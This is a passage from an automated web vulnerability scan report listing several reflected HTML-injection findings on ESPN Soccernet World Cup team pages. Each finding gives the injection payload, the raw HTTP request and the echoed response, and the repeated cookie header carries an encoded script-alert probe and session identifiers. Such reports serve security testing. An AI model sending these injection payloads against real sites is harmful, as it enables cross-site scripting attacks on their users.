Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:20:01 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:20:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN02
Cache-Expires: Sat, 06 Nov 2010 23:25:01 GMT
Content-Length: 81889
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Netherlands Footbal
...[SNIP]...
<a href="/worldcup2010/team?team=449&accaf"><a>fe1ec450d74=1&_slug_=netherlands&accaf">
...[SNIP]...

5.83. http://soccernet.espn.go.com/worldcup2010/team/_/team/451/south-korea [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/451/south-korea

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1e3a"><a>0e9f0d0eed8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/451/south-koreab1e3a"><a>0e9f0d0eed8 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:29:10 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:29:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN33
Cache-Expires: Sat, 06 Nov 2010 23:34:10 GMT
Content-Length: 81932
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>South Korea Footbal
...[SNIP]...
<a href="/worldcup2010/team?team=451&_slug_=south-koreab1e3a"><a>0e9f0d0eed8&topId=792536&linktext=Huh+decides+not+to+renew+contract">
...[SNIP]...

5.84. http://soccernet.espn.go.com/worldcup2010/team/_/team/451/south-korea [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/451/south-korea

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28a78"><a>ad6c5189518 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/451/south-korea?28a78"><a>ad6c5189518=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:27:28 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:27:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN03
Cache-Expires: Sat, 06 Nov 2010 23:32:28 GMT
Content-Length: 82040
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>South Korea Footbal
...[SNIP]...
<a href="/worldcup2010/team?team=451&28a78"><a>ad6c5189518=1&_slug_=south-korea&28a78">
...[SNIP]...

5.85. http://soccernet.espn.go.com/worldcup2010/team/_/team/455/greece [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/455/greece

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bf60"><a>27f1ff77858 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/455/greece5bf60"><a>27f1ff77858 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:10:41 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:10:41 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN13
Cache-Expires: Sat, 06 Nov 2010 23:15:41 GMT
Content-Length: 82126
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Greece Football / S
...[SNIP]...
<a href="/worldcup2010/team?team=455&_slug_=greece5bf60"><a>27f1ff77858&topId=766098&linktext=Rehhagel+steps+down+as+Greece+coach">
...[SNIP]...

5.86. http://soccernet.espn.go.com/worldcup2010/team/_/team/455/greece [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/455/greece

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9866"><a>90f66760c97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/455/greece?a9866"><a>90f66760c97=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:08:55 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:08:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN11
Cache-Expires: Sat, 06 Nov 2010 23:13:54 GMT
Content-Length: 82234
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Greece Football / S
...[SNIP]...
<a href="/worldcup2010/team?team=455&a9866"><a>90f66760c97=1&_slug_=greece&a9866">
...[SNIP]...

5.87. http://soccernet.espn.go.com/worldcup2010/team/_/team/467/south-africa [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/467/south-africa

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f1e2"><a>30af7f0b19c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/467/south-africa6f1e2"><a>30af7f0b19c HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:58 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:28:58 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN17
Cache-Expires: Sat, 06 Nov 2010 23:33:58 GMT
Content-Length: 82316
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>South Africa Footba
...[SNIP]...
<a href="/worldcup2010/team?team=467&_slug_=south-africa6f1e2"><a>30af7f0b19c&topId=792945&linktext=South+African+president+praises+side">
...[SNIP]...

5.88. http://soccernet.espn.go.com/worldcup2010/team/_/team/467/south-africa [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/467/south-africa

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c1ec"><a>0e9b1b1a4b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/467/south-africa?4c1ec"><a>0e9b1b1a4b5=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:27:13 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:27:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN33
Cache-Expires: Sat, 06 Nov 2010 23:32:12 GMT
Content-Length: 82424
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>South Africa Footba
...[SNIP]...
<a href="/worldcup2010/team?team=467&4c1ec"><a>0e9b1b1a4b5=1&_slug_=south-africa&4c1ec">
...[SNIP]...

5.89. http://soccernet.espn.go.com/worldcup2010/team/_/team/468/slovakia [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/468/slovakia

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9049"><a>2c9ee8a6c83 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/468/slovakiac9049"><a>2c9ee8a6c83 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:25 GMT
Content-Type: text/html; charset=iso-8859-1
